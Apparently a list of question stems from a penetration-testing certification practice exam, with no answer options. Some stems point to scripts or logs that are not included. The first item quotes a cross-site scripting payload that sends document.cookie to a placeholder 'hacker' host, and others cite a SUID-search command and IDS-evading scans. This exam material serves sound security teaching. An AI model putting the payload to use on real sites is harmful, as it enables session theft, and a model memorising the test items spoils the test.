Given the following code: var+img=new+Image();img.src="http://hacker/%20+%20document.cookie; Which of the following are the BEST methods to prevent this type of attack? (Choose two.)
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based on the version number of the service. Which of the following methods would BEST support validation of the possible findings?
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
A software development team is concerned that a new product’s 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?
Which of the following tools provides Python classes for interacting with network protocols?
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?
A penetration tester wants to scan a target network without being detected by the client’s IDS. Which of the following scans is MOST likely to avoid detection?
A penetration tester finds a vulnerable script that accepts unvalidated inputs allowing command injection. Which of the following actions should the tester take FIRST?
During a penetration test, a tester identifies an SQL injection vulnerability. What is the BEST way to report this finding to the client?
A tester needs to ensure confidentiality of sensitive data during transmission. Which of the following should the tester recommend?
A company has provided a penetration tester with authorized access to internal networks and systems. What is the MOST important action for the tester to take before starting the assessment?
What is the primary purpose of conducting a penetration test on a new network installation before it goes live?
A penetration tester has discovered that a server is vulnerable to an old SSL/TLS vulnerability. What is the BEST immediate action?
Which of the following tools is used to perform a brute force attack on a password?
A penetration tester is conducting a security assessment for a mobile application. Which of the following is the BEST method to protect sensitive information stored by the app?
What is the primary purpose of a Blue Team during a red team-blue team exercise?
During an assessment, a penetration tester finds that a company’s login page is vulnerable to a buffer overflow attack. What is the FIRST step the tester should take?
A security team is conducting a penetration test on their company’s applications to ensure compliance with security policies. What should the team do FIRST?
A penetration tester is using a public exploit tool to test for a common vulnerability. The tool reports no vulnerabilities, but the tester suspects the system is still vulnerable. What should the tester do next?
What is the most common goal of a denial-of-service attack performed during a penetration test?
Which of the following is a type of security testing that specifically identifies vulnerabilities in network protocols?
A penetration tester needs to provide evidence of a security breach that occurred in a client’s database system. What is the BEST way to gather this evidence?
During an investigation, an incident response team attempts to understand the source of an incident. Which of the following incident response activities describes this process?
A security practitioner completes a vulnerability assessment on a company’s network and finds several vulnerabilities, which the operations team remediates. Which of the following should be done next?
An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device. Which of the following best describes the user’s activity?
Which of the following allows for the attribution of messages to individuals?
A penetration tester is evaluating the security of a new web application. What is the FIRST action the tester should take?
A security consultant is designing a new infrastructure with a focus on high availability. Which of the following should be prioritized?
A network technician receives an alert from a network monitoring system. Which of the following is the FIRST step the technician should take?
A security analyst is assessing a small company’s network and notices that there is an unexpectedly high amount of traffic going to a file server. What should the analyst do NEXT?
Which of the following protocols is considered secure but vulnerable to downgrade attacks when configuring a web server?
During a security review, a tester notices that a system that stores sensitive information is accessible from the public internet. What is the MOST appropriate action?
A penetration tester finds that a network is vulnerable to an old protocol exploit. Which of the following should the tester recommend replacing it with?
A security professional is conducting a penetration test and identifies a potential threat. What is the NEXT step the professional should take?
An organization is preparing to deploy a new application. What is the MOST important security aspect to consider?
A security analyst is configuring tools for a network audit. Which of the following should the analyst configure FIRST?
A company’s security policies require that all sensitive data transmitted over the network must be encrypted. Which of the following should be implemented to ensure compliance?
Which of the following would be the BEST method for securely disposing of an old hard drive within an organization?
A penetration tester discovers a network share accessible to all authenticated users. This share contains sensitive data. What should the tester do NEXT?
A company is considering implementing a new TCP/IP-based protocol for sensitive transactions. Which of the following would be the MOST secure option?
During a penetration test, a tester discovers a critical vulnerability that allows remote code execution. What is the FIRST action the tester should take?
Which of the following encryption methods does NOT provide forward secrecy?
A penetration tester is evaluating the security of a new online banking application. What is the FIRST action the tester should take?
A company requires its penetration testers to follow a strict methodology when conducting assessments. Which of the following is a primary reason for this requirement?
A penetration tester finds that a system is vulnerable to an old SSL/TLS vulnerability. What is the BEST immediate action?
Which of the following BEST describes a security risk that could arise from telecommuting?
A penetration tester wrote the following script to be used in one engagement: Which of the following actions will this script perform?
The results of an Nmap scan are as follows: Which of the following device types will MOST likely have a similar response?
A penetration tester conducted an assessment on a web server. The logs from this session show the following: Which of the following attacks is being attempted?
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
A penetration tester is exploring a client’s website. The tester performs a curl command and obtains the following: Which of the following tools would be BEST for the penetration tester to use to explore this site further?
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A penetration tester ran the following command on a system: find / -user root -perm -4000 -print 2>/dev/null Which of the following is the tester trying to accomplish?
A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. Which of the following commands should the engineer use to achieve the objective in the least amount of time?
A penetration tester is performing a social engineering penetration test and was able to create a remote session. Which of the following social engineering techniques was most likely successful?
During an assessment, a penetration tester was able to get access on all target servers by attempting authentication using a service account key that was published on the intranet site as part of a standard procedure. Which of the following should the penetration tester recommend for this type of finding?
A penetration tester discovers that an organization’s infrastructure is hosted in the cloud. Which of the following technologies should the penetration tester explore for vulnerabilities?
Given the following table: Which of the following involves an attempt to take advantage of database misconfigurations?
An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network. Which of the following should the administrator use to accomplish this goal?
What is the main security concern when using third-party code libraries in application development?
Which of the following types of penetration tests focuses on evaluating the physical security of a location?
Which method is MOST commonly used to exploit a buffer overflow vulnerability?
A penetration tester is reviewing logs from a client’s firewall and notices a large amount of outgoing traffic to a known malicious IP address. What is the NEXT step the tester should take?
Which of the following is the BEST tool for conducting a wireless network penetration test?
A tester gains unauthorized access to a web application by exploiting an SQL injection vulnerability. What should the tester do NEXT?
Which of the following commands will return information about open ports on a Linux system?
A penetration tester is tasked with identifying vulnerabilities in a legacy web application. What is the FIRST tool the tester should use?
Which of the following is the primary purpose of fuzz testing during a penetration test?
A penetration tester is preparing to test a client’s network for vulnerabilities. Which of the following should the tester request from the client before beginning the test?
Which of the following methods is used to establish a covert communication channel?
A penetration tester is trying to evade detection by altering the signatures of payloads in a script. Which of the following techniques is the tester MOST likely using?
What is the primary goal of a red team exercise?
A penetration tester is conducting a physical security test and gains access to the server room by tailgating an employee. What is the tester simulating?
Which of the following BEST describes the purpose of lateral movement during a penetration test?
A security team is performing a web application penetration test and discovers that a specific user input field is vulnerable to cross-site scripting (XSS). What should the team do NEXT?
A tester uses a known vulnerability in a software package to execute arbitrary code. What is the tester MOST likely performing?
Which of the following tools is commonly used to conduct a DNS enumeration attack?
Which of the following is an effective method for testing the security of an organization’s internal network without disrupting normal operations?
